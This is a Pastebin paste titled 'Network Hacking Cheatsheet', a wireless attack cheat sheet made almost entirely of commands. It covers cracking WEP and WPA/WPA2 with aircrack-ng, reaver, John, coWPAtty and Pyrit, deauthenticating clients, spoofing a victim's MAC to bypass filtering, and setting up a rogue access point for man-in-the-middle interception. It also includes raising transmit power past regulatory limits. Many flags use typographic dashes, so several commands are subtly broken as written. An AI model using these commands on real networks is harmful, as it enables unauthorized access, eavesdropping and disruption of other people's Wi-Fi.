Advertisement
Sweetening

Network Hacking Cheatsheet

Apr 9th, 2024
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.32 KB | None | 0 0
  1. ### Wireless Penetration Testing Cheat Sheet
  2. ## WIRELESS ANTENNA
  3. # Open the Monitor Mode
  4.  
  5. ifconfig wlan0mon down
  6. iwconfig wlan0mon mode monitor
  7. ifconfig wlan0mon up
  8.  
  9. # Increase Wi-Fi TX Power
  10. iw reg set B0
  11. iwconfig wlan0 txpower <NmW|NdBm|off|auto>
  12. # txpower is 30 (generally)
  13. # txpower is depends your country, please googling
  14. iwconfig
  15.  
  16. # Change WiFi Channel
  17. iwconfig wlan0 channel <SetChannel(1-14)>
  18.  
  19. ## WEP CRACKING
  20. # Method 1 : Fake Authentication Attack
  21.  
  22. airmon-ng start wlan0
  23. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  24. # What’s my mac?
  25. macchanger --show wlan0mon
  26. aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
  27. aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
  28. aircrack-ng –b <BSSID> <PCAP_of_FileName>
  29.  
  30. # Method 2 : ARP Replay Attack
  31. airmon-ng start wlan0
  32. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  33.  
  34. # What’s my mac?
  35. macchanger --show wlan0mon
  36. aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
  37. aircrack-ng –b <BSSID> <PCAP_of_FileName>
  38.  
  39. # Method 3 : Chop Chop Attack
  40. airmon-ng start wlan0
  41. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  42. # What’s my mac?
  43. macchanger --show wlan0mon
  44. aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
  45. aireplay-ng -4 –b <BSSID> -h <OurMac> wlan0mon
  46. # Press ‘y’ ;
  47. packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
  48. aireplay-ng -2 –r <FileName2> wlan0mon
  49. aircrack-ng <PCAP_of_FileName>
  50.  
  51. # Method 4 : Fragmentation Attack
  52. airmon-ng start wlan0
  53. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  54. # What’s my mac?
  55. macchanger --show wlan0mon
  56. aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
  57. aireplay-ng -5 –b<BSSID> -h < OurMac > wlan0mon
  58. # Press ‘y’ ;
  59. packetforge-ng -0 –a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
  60. aireplay-ng -2 –r <FileName2> wlan0mon
  61. aircrack-ng <PCAP_of_FileName>
  62.  
  63. # Method 5 : SKA (Shared Key Authentication) Type Cracking
  64. airmon-ng start wlan0
  65. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  66. aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
  67. ifconfig wlan0mon down
  68. macchanger –-mac <VictimMac> wlan0mon
  69. ifconfig wlan0mon up
  70. aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
  71. aireplay-ng –-deauth 1 –a <BSSID> -h <FakedMac> wlan0mon
  72. aircrack-ng <PCAP_of_FileName>
  73.  
  74. ## WPA / WPA2 CRACKING
  75.  
  76. # Method 1 : WPS Attack
  77. airmon-ng start wlan0
  78. apt-get install reaver
  79. wash –i wlan0mon –C
  80. reaver –i wlan0mon –b <BSSID> -vv –S
  81. # or, Specific attack
  82. reaver –i –c <Channel> -b <BSSID> -p <PinCode> -vv –S
  83.  
  84. # Method 2 : Dictionary Attack
  85. airmon-ng start wlan0
  86. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  87. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  88. aircrack-ng –w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
  89.  
  90. # Method 3 : Crack with John The Ripper
  91. airmon-ng start wlan0
  92. airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  93. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  94. cd /pentest/passwords/john
  95. ./john –wordlist=<Wordlist> --rules –stdout|aircrack-ng -0 –e <ESSID> -w - <PCAP_of_FileName>
  96.  
  97. # Method 4 : Crack with coWPAtty
  98. airmon-ng start wlan0
  99. airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  100. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  101. cowpatty –r <FileName> -f <Wordlist> -2 –s <SSID>
  102. genpmk –s <SSID> –f <Wordlist> -d <HashesFileName>
  103. cowpatty –r <PCAP_of_FileName> -d <HashesFileName> -2 –s <SSID>
  104.  
  105. # Method 5 : Crack with Pyrit
  106. airmon-ng start wlan0
  107. airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  108. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  109. pyrit –r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
  110. pyrit –i <Wordlist> import_passwords
  111. pyrit –e <ESSID> create_essid
  112. pyrit batch
  113. pyrit –r <PCAP_of_FileName> attack_db
  114.  
  115. # Method 6 : Precomputed WPA Keys Database Attack
  116. airmon-ng start wlan0
  117. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  118. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  119. kwrite ESSID.txt
  120. airolib-ng NEW_DB --import essid ESSID.txt
  121. airolib-ng NEW_DB --import passwd <DictionaryFile>
  122. airolib-ng NEW_DB --clean all
  123. airolib-ng NEW_DB --stats
  124. airolib-ng NEW_DB --batch
  125. airolib-ng NEW_DB --verify all
  126. aircrack-ng –r NEW_DB <Handshaked_PCAP>
  127.  
  128. ## FIND HIDDEN SSID
  129.  
  130. airmon-ng start wlan0
  131. airodump-ng –c <Channel> --bssid <BSSID> wlan0mon
  132. aireplay-ng -0 20 –a <BSSID> -c <VictimMac> wlan0mon
  133.  
  134. ## BYPASS MAC FILTERING
  135.  
  136. airmon-ng start wlan0
  137. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  138. aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
  139. ifconfig wlan0mon down
  140. macchanger –-mac <VictimMac> wlan0mon
  141. ifconfig wlan0mon up
  142. aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
  143.  
  144. ## MAN IN THE MIDDLE ATTACK
  145.  
  146. airmon-ng start wlan0
  147. airbase-ng –e “<FakeBSSID>” wlan0mon
  148. brctl addbr <VariableName>
  149. brctl addif <VariableName> wlan0mon
  150. brctl addif <VariableName> at0
  151. ifconfig eth0 0.0.0.0 up
  152. ifconfig at0 0.0.0.0 up
  153. ifconfig <VariableName> up
  154. aireplay-ng –deauth 0 –a <victimBSSID> wlan0mon
  155. dhclient3 <VariableName> &
  156. wireshark &
  157. ;select <VariableName> interface
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement